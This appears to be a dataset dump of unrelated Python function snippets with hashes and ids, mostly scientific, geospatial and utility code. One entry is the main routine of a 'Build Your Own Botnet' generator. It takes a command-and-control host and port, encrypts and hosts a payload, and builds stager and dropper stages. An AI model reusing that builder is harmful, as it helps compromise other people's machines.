content (stringlengths 35 to 762k) | sha1 (stringlengths 40 to 40) | id (int64 0 to 3.66M)
---|---|---|
def generate_extra(candidate: tuple, expansion_set, murder_list=None, attempted=None) -> list:
"""
Special routine for the graph-based algorithm: expands a candidate by one
constraint at a time and keeps only the children accepted by the check
built from `attempted` and `murder_list`.
:param candidate: current candidate, as a tuple of constraints
:param expansion_set: iterable of constraints to try appending to the candidate
:param murder_list: forwarded to manufacture_lambda to build the acceptance check
:param attempted: forwarded to manufacture_lambda to build the acceptance check
:return: list of accepted child candidates (sorted tuples)
"""
check = manufacture_lambda(attempted, murder_list)
accepted_sets = list()
for regular_constraint in expansion_set:
val = list(candidate)
val.append(regular_constraint)
future_child = tuple(sorted(val))
if check(future_child):
accepted_sets.append(future_child)
return accepted_sets
|
e38d605df2a562b269189c8e7714ec97e89d8f36
| 20,100 |
from typing import Tuple
from typing import Dict
def extract_oe_stereochemistry(
molecule: Molecule, oe_mol: "OEMol"
) -> Tuple[Dict[int, AtomStereochemistry], Dict[int, BondStereochemistry]]:
"""Extracts the CIP stereochemistry of each atom and bond in a OE molecule."""
atom_stereo = {
oe_atom.GetIdx(): atom_cip_stereochemistry(oe_mol, oe_atom)
for oe_atom in oe_mol.GetAtoms()
}
bond_stereo_tuples = {
tuple(
sorted([oe_bond.GetBgnIdx(), oe_bond.GetEndIdx()])
): bond_cip_stereochemistry(oe_mol, oe_bond)
for oe_bond in oe_mol.GetBonds()
}
bond_stereo = {
i: bond_stereo_tuples[tuple(sorted([bond.atom1_index, bond.atom2_index]))]
for i, bond in enumerate(molecule.bonds)
}
return atom_stereo, bond_stereo
|
0d051e847c94a81585a1478fc10bfac335d700a6
| 20,101 |
import os.path as op  # aliases inferred from the function body (op=os.path, nb=nibabel, np=numpy)
import numpy as np
import nibabel as nb
from dipy.denoise.nlmeans import nlmeans
from scipy.ndimage.morphology import binary_erosion
from scipy import ndimage
def nlmeans_proxy(in_file, settings,
snr=None,
smask=None,
nmask=None,
out_file=None):
"""
Uses non-local means to denoise 4D datasets
"""
if out_file is None:
fname, fext = op.splitext(op.basename(in_file))
if fext == '.gz':
fname, fext2 = op.splitext(fname)
fext = fext2 + fext
out_file = op.abspath('./%s_denoise%s' % (fname, fext))
img = nb.load(in_file)
hdr = img.header
data = img.get_data()
aff = img.affine
if data.ndim < 4:
data = data[..., np.newaxis]
data = np.nan_to_num(data)
if data.max() < 1.0e-4:
raise RuntimeError('There is no signal in the image')
df = 1.0
if data.max() < 1000.0:
df = 1000. / data.max()
data *= df
b0 = data[..., 0]
if smask is None:
smask = np.zeros_like(b0)
smask[b0 > np.percentile(b0, 85.)] = 1
smask = binary_erosion(
smask.astype(np.uint8), iterations=2).astype(np.uint8)
if nmask is None:
nmask = np.ones_like(b0, dtype=np.uint8)
bmask = settings['mask']
if bmask is None:
bmask = np.zeros_like(b0)
bmask[b0 > np.percentile(b0[b0 > 0], 10)] = 1
label_im, nb_labels = ndimage.label(bmask)
sizes = ndimage.sum(bmask, label_im, range(nb_labels + 1))
maxidx = np.argmax(sizes)
bmask = np.zeros_like(b0, dtype=np.uint8)
bmask[label_im == maxidx] = 1
nmask[bmask > 0] = 0
else:
nmask = np.squeeze(nmask)
nmask[nmask > 0.0] = 1
nmask[nmask < 1] = 0
nmask = nmask.astype(bool)
nmask = binary_erosion(nmask, iterations=1).astype(np.uint8)
den = np.zeros_like(data)
est_snr = True
if snr is not None:
snr = [snr] * data.shape[-1]
est_snr = False
else:
snr = []
for i in range(data.shape[-1]):
d = data[..., i]
if est_snr:
s = np.mean(d[smask > 0])
n = np.std(d[nmask > 0])
snr.append(s / n)
den[..., i] = nlmeans(d, snr[i], **settings)
den = np.squeeze(den)
den /= df
nb.Nifti1Image(den.astype(hdr.get_data_dtype()), aff,
hdr).to_filename(out_file)
return out_file, snr
|
69629ef536830ccecdee09e5acfadf02d892cc9d
| 20,102 |
from typing import Union
import os
from typing import Any
from typing import Optional
from typing import List
from pathlib import Path
def dissolve(
input_path: Union[str, 'os.PathLike[Any]'],
output_path: Union[str, 'os.PathLike[Any]'],
explodecollections: bool,
groupby_columns: Optional[List[str]] = None,
columns: Optional[List[str]] = [],
aggfunc: str = 'first',
tiles_path: Union[str, 'os.PathLike[Any]'] = None,
nb_squarish_tiles: int = 1,
clip_on_tiles: bool = True,
input_layer: str = None,
output_layer: str = None,
nb_parallel: int = -1,
verbose: bool = False,
force: bool = False):
"""
Applies a dissolve operation on the geometry column of the input file. Only
supports (Multi)Polygon files.
If the output is tiled (by specifying a tiles_path or nb_squarish_tiles > 1),
the result will be clipped on the output tiles and the tile borders are
never crossed.
Remarks:
* only aggfunc = 'first' is supported at the moment.
Args:
input_path (PathLike): the input file
output_path (PathLike): the file to write the result to
explodecollections (bool): True to output only simple geometries. If
False is specified, this can result in huge geometries for large
files, so beware...
groupby_columns (List[str], optional): columns to group on while
aggregating. Defaults to None, resulting in a spatial union of all
geometries that touch.
columns (List[str], optional): columns to retain in the output file.
The columns in parameter groupby_columns are always retained. The
other columns specified are aggregated as specified in parameter
aggfunc. If None is specified, all columns are retained.
Defaults to [] (= only the groupby_columns are retained).
aggfunc (str, optional): aggregation function to apply to columns not
grouped on. Defaults to 'first'.
tiles_path (PathLike, optional): a path to a geofile containing tiles.
If specified, the output will be dissolved/unioned only within the
tiles provided.
Can be used to evade huge geometries being created if the input
geometries are very interconnected.
Defaults to None (= the output is not tiled).
nb_squarish_tiles (int, optional): the approximate number of tiles the
output should be dissolved/unioned to. If > 1, a tiling grid is
automatically created based on the total bounds of the input file.
The input geometries will be dissolved/unioned only within the
tiles generated.
Can be used to evade huge geometries being created if the input
geometries are very interconnected.
Defaults to 1 (= the output is not tiled).
clip_on_tiles (bool, optional): deprecated: should always be True!
If the output is tiled (by specifying a tiles_path
or a nb_squarish_tiles > 1), the result will be clipped
on the output tiles and the tile borders are never crossed.
When False, a (scalable, fast) implementation always resulted in
some geometries not being merged or in duplicates.
Defaults to True.
input_layer (str, optional): input layer name. Optional if the
file only contains one layer.
output_layer (str, optional): output layer name. Optional if the
file only contains one layer.
nb_parallel (int, optional): the number of parallel processes to use.
If not specified, all available processors will be used.
verbose (bool, optional): write more info to the output.
Defaults to False.
force (bool, optional): overwrite existing output file(s).
Defaults to False.
"""
# Init
if clip_on_tiles is False:
logger.warning("The clip_on_tiles parameter is deprecated! It is ignored and always treated as True. When False, a fast implementation results in some geometries not being merged or in duplicates.")
if tiles_path is not None or nb_squarish_tiles > 1:
raise Exception("clip_on_tiles is deprecated, and the behaviour of clip_on_tiles is False is not supported anymore.")
tiles_path_p = None
if tiles_path is not None:
tiles_path_p = Path(tiles_path)
# If an empty list of geometry columns is passed, convert it to None to
# simplify the rest of the code
if groupby_columns is not None and len(groupby_columns) == 0:
groupby_columns = None
logger.info(f"Start dissolve on {input_path} to {output_path}")
return geofileops_gpd.dissolve(
input_path=Path(input_path),
output_path=Path(output_path),
explodecollections=explodecollections,
groupby_columns=groupby_columns,
columns=columns,
aggfunc=aggfunc,
tiles_path=tiles_path_p,
nb_squarish_tiles=nb_squarish_tiles,
input_layer=input_layer,
output_layer=output_layer,
nb_parallel=nb_parallel,
verbose=verbose,
force=force)
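# A minimal usage sketch (not from the original source): the file paths and the
# groupby column below are hypothetical, and running it requires the surrounding
# geofileops package (geofileops_gpd, logger) to be importable.
dissolve(
    input_path="parcels.gpkg",
    output_path="parcels_dissolved.gpkg",
    explodecollections=True,
    groupby_columns=["municipality"],
    nb_parallel=4,
)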
|
3f3d89bf99f025ea23c338d0c36f9e7cc9e9c6ae
| 20,103 |
def jointImgTo3D(sample):
"""
Normalize sample to metric 3D
:param sample: joints in (x,y,z) with x,y in image coordinates and z in mm
:return: normalized joints in mm
"""
ret = np.zeros((3,), np.float32)
# convert to metric using f
ret[0] = (sample[0]-centerX)*sample[2]/focalLengthX
ret[1] = (sample[1]-centerY)*sample[2]/focalLengthY
ret[2] = sample[2]
return ret
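# Hedged usage sketch (not from the original source): the intrinsics below are
# hypothetical placeholders for the module-level globals (centerX, centerY,
# focalLengthX, focalLengthY) that jointImgTo3D reads.
import numpy as np

centerX, centerY = 160.0, 120.0
focalLengthX, focalLengthY = 241.42, 241.42
uvz = np.array([200.0, 150.0, 800.0], np.float32)  # pixel u, v and depth z in mm
xyz = jointImgTo3D(uvz)
# xyz ~= [132.5, 99.4, 800.0] -> metric coordinates in mm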
|
43726ed712e268c9fd2434fa2734ff8aa0ee2d0a
| 20,104 |
from typing import Set
from typing import Callable
from typing import List
import logging
def _find_registered_loggers(
source_logger: Logger, loggers: Set[str], filter_func: Callable[[Set[str]], List[logging.Logger]]
) -> List[logging.Logger]:
"""Filter root loggers based on provided parameters."""
root_loggers = filter_func(loggers)
source_logger.debug(f"Filtered root loggers: {root_loggers}")
return root_loggers
|
a15464298030821cea0beb61eaf1c679732e4155
| 20,105 |
def build_param_obj(key, val, delim=''):
"""Creates a Parameter object from key and value, surrounding key with delim
Parameters
----------
key : str
* key to use for parameter
value : str
* value to use for parameter
delim : str
* str to surround key with when adding to parameter object
Returns
-------
param_obj : :class:`taniumpy.object_types.parameter.Parameter`
* Parameter object built from key and val
"""
# create a parameter object
param_obj = taniumpy.Parameter()
param_obj.key = '{0}{1}{0}'.format(delim, key)
param_obj.value = val
return param_obj
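# Hedged usage sketch (not from the original source): the key/value below are
# hypothetical, and taniumpy must be importable for Parameter() to work.
param = build_param_obj(key='$computer_name', val='WIN-01', delim='||')
# param.key   -> '||$computer_name||'
# param.value -> 'WIN-01'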
|
0fba11c4564ef57eab45ffd02bed887c42a14121
| 20,106 |
def copy_fixtures_to_matrixstore(cls):
"""
Decorator for TestCase classes which copies data from Postgres into an
in-memory MatrixStore instance. This allows us to re-use database fixtures,
and the tests designed to work with those fixtures, to test
MatrixStore-powered code.
"""
# These methods have been decorated with `@classmethod` so we need to use
# `__func__` to get a reference to the original, undecorated method
decorated_setUpClass = cls.setUpClass.__func__
decorated_tearDownClass = cls.tearDownClass.__func__
def setUpClass(inner_cls):
decorated_setUpClass(inner_cls)
matrixstore = matrixstore_from_postgres()
stop_patching = patch_global_matrixstore(matrixstore)
# Have to wrap this in a staticmethod decorator otherwise Python thinks
# we're trying to create a new class method
inner_cls._stop_patching = staticmethod(stop_patching)
new_settings = override_settings(
CACHES={
"default": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"}
}
)
new_settings.enable()
inner_cls._new_settings = new_settings
def tearDownClass(inner_cls):
inner_cls._stop_patching()
inner_cls._new_settings.disable()
decorated_tearDownClass(inner_cls)
cls.setUpClass = classmethod(setUpClass)
cls.tearDownClass = classmethod(tearDownClass)
return cls
|
b64ef9b23afc76b8f1b2cf1ae6b56635cd6e4f56
| 20,107 |
def intersect_description(first, second):
"""
Intersect two description objects.
:param first: First object to intersect with.
:param second: Other object to intersect with.
:return: New object.
"""
# Check that none of the object is None before processing
if first is None:
return second
if second is None:
return first
if first.description_type == second.description_type:
# Same MIME types, can merge content
value = let_user_choose(first.value, second.value)
description_type = first.description_type
else:
# MIME types are different, set MIME type to text
description_type = 'text/enriched'
value = """
Original MIME-type for first description: '{0}'.
{1}
----
Original MIME-type for second description: '{2}'.
{3}
""".format(first.description_type, first.value,
second.description_type, second.value)
return Description(value, description_type)
|
93d35314f8ab6ef0978de942ecfad3719c8f4971
| 20,108 |
def smooth_correlation_matrix(cor, sigma, exclude_diagonal=True):
"""Apply a simple gaussian filter on a correlation matrix.
Parameters
----------
cor : numpy array
Correlation matrix.
sigma : int
Scale of the gaussian filter.
exclude_diagonal : boolean, optional
Whether to exclude the diagonal from the smoothing. That is what should
be done generally because the diagonal is 1 by definition.
Returns
-------
cor_new : numpy array
Smoothed correlation matrix.
"""
n_dim = len(np.diag(cor))
cor_new = np.copy(cor)
if exclude_diagonal:
cor_new[0, 0] = 0.5 * (cor[0, 1] + cor[1, 0])
cor_new[n_dim - 1, n_dim - 1] = 0.5 * (cor[n_dim - 1, n_dim - 2] +
cor[n_dim - 2, n_dim - 1])
for i in range(1, n_dim - 1):
cor_new[i, i] = 0.25 * (cor[i, i - 1] + cor[i, i + 1] +
cor[i - 1, i] + cor[i + 1, i])
cor_new = gaussian_filter(cor_new, sigma, mode='nearest')
if exclude_diagonal:
for i in range(n_dim):
cor_new[i, i] = cor[i, i]
return cor_new
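# Hedged usage sketch (not from the original source): assumes numpy (np) and
# scipy.ndimage.gaussian_filter are available at module level, as the function
# body implies.
import numpy as np
from scipy.ndimage import gaussian_filter

rng = np.random.default_rng(0)
noise = rng.normal(scale=0.05, size=(50, 50))
cor = np.clip(np.eye(50) + (noise + noise.T) / 2.0, -1.0, 1.0)
cor_smooth = smooth_correlation_matrix(cor, sigma=2)
assert np.allclose(np.diag(cor_smooth), np.diag(cor))  # diagonal left untouched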
|
753337cc12578b5c2333392f01e028204ac2f0e0
| 20,109 |
def quantize_iir_filter(filter_dict, n_bits):
"""
Quantize the IIR filter tuple for sos_filt functions
Parameters:
- filter_dict: dict, contains the quantized filter dictionary with the following keys:
- coeff: np.array(size=(M, 6)), float representation of the coefficients
- coeff_scale: np.array(size=(M, 2)), scale all coefficients, not used here
- coeff_shift: np.array(size=(M, 2), dtype=int), amount to shift during computation
- y_scale: float, scale factor of the output, unused here
- y_shift: int, number of bits to shift the output for scaling
- n_bits: int, number of bits to represent the filter coefficients
Returns: tuple:
- a: np.array(size=(M+1, 3), dtype=int), quantized denominator coefficients
- a_shift: np.array(size=(M+1), dtype=int), amount to shift during computation
- b: np.array(size=(M+1, 3), dtype=int), quantized numerator coefficients
- b_shift: np.array(size=(M+1), dtype=int), amount to shift during computation
- y_shift: int, amount to shift the output
"""
quant_coeff = filter_dict["coeff"]
scale_coeff = filter_dict["coeff_scale"]
comp_shift = filter_dict["coeff_shift"]
output_shift = filter_dict["y_shift"]
M = quant_coeff.shape[0]
assert quant_coeff.shape == (M, 6)
assert scale_coeff.shape == (M, 2)
assert comp_shift.shape == (M, 2)
assert comp_shift.dtype == int
assert np.all(comp_shift <= 0)
# generate the coefficients
a = np.ones((M + 1, 3), dtype=int) << (n_bits - 1)
b = np.ones((M + 1, 3), dtype=int) << (n_bits - 1)
a_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1)
b_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1)
for m in range(M):
a[m + 1, :] = quantize_to_int(quant_coeff[m, 3:], scale_coeff[m, 1], n_bits)
b[m + 1, :] = quantize_to_int(quant_coeff[m, :3], scale_coeff[m, 0], n_bits)
a_shift[m + 1] = -comp_shift[m, 1]
b_shift[m + 1] = -comp_shift[m, 0]
return a, a_shift, b, b_shift, output_shift
|
a8e93302072733d77acb563cd758725f14c05420
| 20,110 |
import json
import traceback
def add_goods(request, openid, store_id, store_name, dsr,
specification, brand, favorable_rate, pic_path, live_recording_screen_path, daily_price, commission_rate,
pos_price, preferential_way, goods_url, hand_card,
storage_condition, shelf_life, unsuitable_people, ability_to_deliver, shipping_cycle, shipping_addresses,
delivery_company, not_shipping):
"""
:request method: POST
Store information
:param store_id: store id (at most 45 characters)
:param store_name: store name (at most 45 characters)
:param dsr: store rating (DSR)
Product information
:param goods_name: product name
:param specification: specification
:param brand: product brand
:param favorable_rate: positive-review rate
:param pic_path: links to the product's main images (list)
:param live_recording_screen_path: link to a screen recording of a well-known streamer selling the product
:param daily_price: regular price
:param live_price: livestream price
:param commission_rate: livestream commission rate
:param pos_price: slot-fee budget
:param preferential_way: livestream promotion mechanism
:param goods_url: product URL
:param hand_card: livestream cue card
Cross-platform price comparison
:param tmall_price: Tmall price
:param taobao_price: Taobao price
:param jd_price: JD.com price
:param pdd_price: Pinduoduo price
:param offline_price: offline supermarket price
Storage and shipping
:param storage_condition: storage conditions
:param shelf_life: shelf life
:param unsuitable_people: groups the product is not suitable for
:param ability_to_deliver: shipping capacity
:param shipping_cycle: shipping cycle
:param shipping_addresses: shipping address(es)
:param delivery_company: logistics/courier company
:param not_shipping: regions not shipped to
:param free_shipping: regions with free shipping
Other
:param comment: remarks
:return:
{'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'}
{'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'}
{'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'}
"""
rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'}
try:
_, data = get_store_data_by_store_id(openid, store_id)
if not data:
is_success = insert_store_info(store_id, store_name, dsr, openid, ignore=True)
if not is_success:
raise InvalidParameter('店铺不存在,且新建失败')
is_success, pk = insert_goods_data(openid, json.loads(request.body))
if is_success:
rsp = {'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'}
except InvalidParameter as e:
rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": str(e)}
except:
logger.exception(traceback.format_exc())
rsp = {'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'}
finally:
return rsp
|
e7a04a316e3fba3a803f20eb459dc8691ccc2642
| 20,111 |
import argparse
def cli_to_args():
"""
converts the command line interface to a series of args
"""
cli = argparse.ArgumentParser(description="")
cli.add_argument('-input_dir',
type=str, required=True,
help='The input directory that contains pngs and svgs of cowboys with Unicode names')
cli.add_argument('-output_dir',
type=str, required=True,
help='The output directory where we will put pngs and svgs of cowboys with plain English names. Yee haw.')
return cli.parse_args()
|
db9502472d1cab92b7564abde2969daa06dbc4aa
| 20,112 |
import random
import argparse
import base64
import os
def main():
"""
Run the generator
"""
util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal')
parser = argparse.ArgumentParser(
prog='client.py',
description="Generator (Build Your Own Botnet)"
)
parser.add_argument('host',
action='store',
type=str,
help='server IP address')
parser.add_argument('port',
action='store',
type=str,
help='server port number')
parser.add_argument('modules',
metavar='module',
action='append',
nargs='*',
help='module(s) to remotely import at run-time')
parser.add_argument('--name',
action='store',
help='output file name')
parser.add_argument('--icon',
action='store',
help='icon image file name')
parser.add_argument('--pastebin',
action='store',
metavar='API',
help='upload the payload to Pastebin (instead of the C2 server hosting it)')
parser.add_argument('--encrypt',
action='store_true',
help='encrypt the payload with a random 128-bit key embedded in the payload\'s stager',
default=False)
parser.add_argument('--compress',
action='store_true',
help='zip-compress into a self-extracting python script',
default=False)
parser.add_argument('--freeze',
action='store_true',
help='compile client into a standalone executable for the current host platform',
default=False)
parser.add_argument('--debug',
action='store_true',
help='enable debugging output for frozen executables',
default=False
)
parser.add_argument(
'-v', '--version',
action='version',
version='0.5',
)
options = parser.parse_args()
key = base64.b64encode(os.urandom(16))
var = generators.variable(3)
modules = _modules(options, var=var, key=key)
imports = _imports(options, var=var, key=key, modules=modules)
hidden = _hidden (options, var=var, key=key, modules=modules, imports=imports)
payload = _payload(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden)
stager = _stager (options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload)
dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager)
return dropper
|
f5c30d902f6123ce66579c7ba9c5dbe4f5ed580b
| 20,113 |
import string
def _get_metadata_from_configuration(
path, name, config,
fields, **kwargs
):
"""Recursively get metadata from configuration.
Args:
path: used to indicate the path to the root element.
mainly for trouble shooting.
name: the key of the metadata section.
config: the value of the metadata section.
fields: all fields defined in os fields or package fields dir.
"""
if not isinstance(config, dict):
raise exception.InvalidParameter(
'%s config %s is not dict' % (path, config)
)
metadata_self = config.get('_self', {})
if 'field' in metadata_self:
field_name = metadata_self['field']
field = fields[field_name]
else:
field = {}
# mapping_to may contain $ placeholders like $partition. Here we replace
# $partition with the key of the corresponding config. The backend then
# can use this kind of feature to support multi partitions when we
# only declare the partition metadata in one place.
mapping_to_template = metadata_self.get('mapping_to', None)
if mapping_to_template:
mapping_to = string.Template(
mapping_to_template
).safe_substitute(
**kwargs
)
else:
mapping_to = None
self_metadata = {
'name': name,
'display_name': metadata_self.get('display_name', name),
'field_type': field.get('field_type', dict),
'display_type': field.get('display_type', None),
'description': metadata_self.get(
'description', field.get('description', None)
),
'is_required': metadata_self.get('is_required', False),
'required_in_whole_config': metadata_self.get(
'required_in_whole_config', False),
'mapping_to': mapping_to,
'validator': metadata_self.get(
'validator', field.get('validator', None)
),
'js_validator': metadata_self.get(
'js_validator', field.get('js_validator', None)
),
'default_value': metadata_self.get('default_value', None),
'default_callback': metadata_self.get('default_callback', None),
'default_callback_params': metadata_self.get(
'default_callback_params', {}),
'options': metadata_self.get('options', None),
'options_callback': metadata_self.get('options_callback', None),
'options_callback_params': metadata_self.get(
'options_callback_params', {}),
'autofill_callback': metadata_self.get(
'autofill_callback', None),
'autofill_callback_params': metadata_self.get(
'autofill_callback_params', {}),
'required_in_options': metadata_self.get(
'required_in_options', False)
}
self_metadata.update(kwargs)
metadata = {'_self': self_metadata}
# Key extension used to do two things:
# one is to return the extended metadata that $<something>
# will be replace to possible extensions.
# The other is to record the $<something> to extended value
# and used in future mapping_to subsititution.
# TODO(grace): select proper name instead of key_extensions if
# you think it is better.
# Suppose key_extension is {'$partition': ['/var', '/']} for $partition
# the metadata for $partition will be mapped to {
# '/var': ..., '/': ...} and kwargs={'partition': '/var'} and
# kwargs={'partition': '/'} will be parsed to recursive metadata parsing
# for sub metadata under '/var' and '/'. Then in the metadata parsing
# for the sub metadata, this kwargs will be used to substitute mapping_to.
key_extensions = metadata_self.get('key_extensions', {})
general_keys = []
for key, value in config.items():
if key.startswith('_'):
continue
if key in key_extensions:
if not key.startswith('$'):
raise exception.InvalidParameter(
'%s subkey %s should start with $' % (
path, key
)
)
extended_keys = key_extensions[key]
for extended_key in extended_keys:
if extended_key.startswith('$'):
raise exception.InvalidParameter(
'%s extended key %s should not start with $' % (
path, extended_key
)
)
sub_kwargs = dict(kwargs)
sub_kwargs[key[1:]] = extended_key
metadata[extended_key] = _get_metadata_from_configuration(
'%s/%s' % (path, extended_key), extended_key, value,
fields, **sub_kwargs
)
else:
if key.startswith('$'):
general_keys.append(key)
metadata[key] = _get_metadata_from_configuration(
'%s/%s' % (path, key), key, value,
fields, **kwargs
)
if len(general_keys) > 1:
raise exception.InvalidParameter(
'found multiple general keys in %s: %s' % (
path, general_keys
)
)
return metadata
|
57dcbf0de49499391d8336d09b5b47d6c0f0d2e8
| 20,114 |
def calcOneFeatureEa(dataSet: list, feature_idx: int):
"""
Compute the E(A) value of a single feature.
:param dataSet: the dataset
:param feature_idx: the selected feature (given as a column index 0, 1, 2, ...)
:return:
"""
attrs = getOneFeatureAttrs(dataSet, feature_idx)
# Get the p, n counts of the whole dataset
p, n = getDatasetPN(dataSet)
ea = 0.0
for attr in attrs:
# Get the p, n counts for this attribute value
attrP, attrN = getOneFeatureAttrPN(dataSet, feature_idx, attr)
# Compute the I(p, n) value for this attribute
attrIPN = calcIpn(attrP, attrN)
ea += (attrP+attrN)/(p+n) * attrIPN
return ea
|
fc800b285bc24246ad9c40070d33ff429e395183
| 20,115 |
from types import SimpleNamespace
def translate_mapping(mapping: list, reference: SimpleNamespace, templ: bool=True, nontempl: bool=True,
correctframe: bool=True, filterframe: bool=True, filternonsense: bool=True):
"""
creates a protein mapping from a dna mapping.
:param mapping: a list/tuple of ops.
:param reference: the reference object to which the mapping is relative.
:param templ: include templated ops
:param nontempl: include nontemplated ops
:param correctframe: removes isolated ops that disrupt the frame
:param filterframe: don't return a mapping if there are remaining frameshifts.
:param filternonsense: don't return a mapping if contains a stop codon
:return:
"""
# create a mapping with the appropriate SNPs
base_mapping = []
if templ:
base_mapping.extend(templated(mapping, reference))
if nontempl:
base_mapping.extend(nontemplated(mapping, reference))
base_mapping.sort(key=lambda x: x[0])
# correct errors
if correctframe:
base_mapping = error_scrub(base_mapping)
# filter for whether it is in frame or not.
if filterframe and not len(transform(reference.seq, base_mapping)) % 3 == len(reference.seq) % 3:
return []
protein = translate(transform(reference.seq, base_mapping), offset=reference.offset)
if filternonsense and "_" in protein:
return []
protein_alns = align_proteins(reference.protein, protein)
return protein_alns
|
3a05ae38d9bccb8b855c91af850a92426c5031f3
| 20,116 |
from copy import copy
from numpy import zeros, unique
from itertools import product
def trainModel(label,bestModel,obs,trainSet,testSet,modelgrid,cv,optMetric='auc'):
""" Train a message classification model """
pred = zeros(len(obs))
fullpred = zeros((len(obs),len(unique(obs))))
model = copy(bestModel.model)
#find the best model via tuning grid
for tune in [dict(zip(modelgrid, v)) for v in product(*modelgrid.values())]:
for k in tune.keys():
setattr(model,k,tune[k])
i = 0
for tr, vl in cv:
model.fit(trainSet.ix[tr].values,obs[tr])
pred[vl] = model.predict_proba(trainSet.ix[vl].values)[:,1]
fullpred[vl,:] = model.predict_proba(trainSet.ix[vl].values)
i += 1
bestModel.updateModel(pred,fullpred,obs,model,trainSet.columns.values,tune,optMetric=optMetric)
#re-train with all training data
bestModel.model.fit(trainSet.values,obs)
print(bestModel)
return {label: {'pred': pred, 'test_pred':bestModel.model.predict_proba(testSet)[:,1]}}
|
8cea9f0044246972e80684fac584693a500198cc
| 20,117 |
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(
state_cmd, timeout=RECOVERY_CMD_TIMEOUT, log_error=True)
|
e517e7df3f5a7a1bf3925a46ce6a780dbc862910
| 20,118 |
def character_state(combat, character):
"""
Get the combat status of a single character, as a tuple of
current_hp, max_hp, total healing
"""
max_hp = Max_hp(character.base_hp)
total_h = 0
for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'):
max_hp.hp += effect.effect_val
current_hp = Current_hp(max_hp.hp)
for wound in Wound.objects.filter(character=character, combat=combat):
current_hp.hp -= wound.amount
for heal in Heal.objects.filter(character=character, combat=combat):
current_hp.hp += heal.amount
total_h += heal.amount
return current_hp, max_hp, total_h
|
d80315934ac653d34dd73cc1a9861b9c6e2f2c9c
| 20,119 |
def load_textfile(path):
"""Returns text file as a str object
"""
with open(path, 'r') as f:
    recs = f.read()  # f.readlines()
return recs
|
8e12a93bb4918cbae7d7e9aad6f09f562eca0c16
| 20,120 |
import numpy as np
import scipy.interpolate
import mathx
def interp1d_to_uniform(x, y, axis=None):
"""Resample array to uniformly sampled axis.
Has some limitations due to use of scipy interp1d.
Args:
x (vector): independent variable
y (array): dependent variable, must broadcast with x
axis (int): axis along which to resample
Returns:
xu: uniformly spaced independent variable
yu: dependent resampled at xu
"""
x = np.asarray(x)
y = np.asarray(y)
if axis is None:
axis = mathx.vector_dim(x)
num = x.shape[axis]
mn = x.min(axis, keepdims=True)
mx = x.max(axis, keepdims=True)
# Limitation of scipy interp1d
x = x.squeeze()
mn = mn.squeeze()
mx = mx.squeeze()
assert x.ndim == 1
xu = np.arange(num)/(num - 1)*(mx - mn) + mn
yu = scipy.interpolate.interp1d(x.squeeze(), y, axis=axis, bounds_error=False)(xu)
return mathx.reshape_vec(xu, axis), yu
|
379071e0e0b718b4d4f8cc970a2b098cf3cab155
| 20,121 |
import os
def get_walkthrought_dir(dm_path):
""" return 3 parameter:
file_index[0]: total path infomation
file_index[1]: file path directory
file_index[2]: file name
"""
file_index = []
for dirPath, dirName, fileName in os.walk(dm_path):
for file in fileName:
path_info = [os.path.join(dirPath, file), dirPath, file]
file_index.append(path_info)
return file_index
|
74ecef62531001c27e05ab42b731739120656695
| 20,122 |
from typing import Dict
def flatten_dict(d: Dict):
"""Recursively flatten dictionaries, ordered by keys in ascending order"""
s = ""
for k in sorted(d.keys()):
if d[k] is not None:
if isinstance(d[k], dict):
s += f"{k}|{flatten_dict(d[k])}|"
else:
s += f"{k}|{d[k]}|"
return s
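# Hedged usage sketch (not from the original source) showing the key-sorted,
# pipe-delimited flattening; None values are dropped.
params = {"b": 2, "a": {"y": None, "x": 1}, "c": "z"}
print(flatten_dict(params))
# -> 'a|x|1||b|2|c|z|'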
|
26663b52ccda2a695aa2367cbaf324698a47d56a
| 20,123 |
import numpy as np
import dask.dataframe as dd  # assumed: `dd` follows the conventional dask.dataframe alias
def getPVvecs(fname):
"""
Generates an ensemble of day long PV activities, sampled 3 different
days for each complete pv data set
"""
datmat = np.zeros((18,48))
df = dd.read_csv(fname)
i = 0
for unique_value in df.Substation.unique():
ttemp, ptemp = PVgettimesandpower("2014-06", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
ttemp, ptemp = PVgettimesandpower("2014-07", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
ttemp, ptemp = PVgettimesandpower("2014-08", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
return datmat
|
322cf6d29d4104953678ec5e4dfbd5a82564ce1c
| 20,124 |
def vis9(n): # DONE
"""
O OO OOO
OO OOO OOOO
OOO OOOO OOOOO
Number of Os:
6 9 12"""
result = 'O' * (n - 1) + 'O\n'
result += 'O' * (n - 1) + 'OO\n'
result += 'O' * (n - 1) + 'OOO\n'
return result
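# Hedged usage sketch (not from the original source): n sets the width of the
# shortest row, matching the middle column of the docstring (9 Os for n=2).
print(vis9(2))
# OO
# OOO
# OOOO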
|
c06c9fdf5d71ef89ce83d5fc2136b9854f018988
| 20,125 |
def derivative_circ_dist(x, p):
"""
Derivative of circumferential distance and derivative function, w.r.t. p
d/dp d(x, p) = d/dp min_{z in [-1, 0, 1]} (|z + p - x|)
Args:
x (float): first angle
p (float): second angle
Returns:
float: d/dp d(x, p)
"""
# pylint: disable=chained-comparison,misplaced-comparison-constant
t = p - x
if t < -0.5 or (0 < t and t < 0.5):
return -1
if t > 0.5 or (-0.5 < t and t < 0):
return 1
return 0
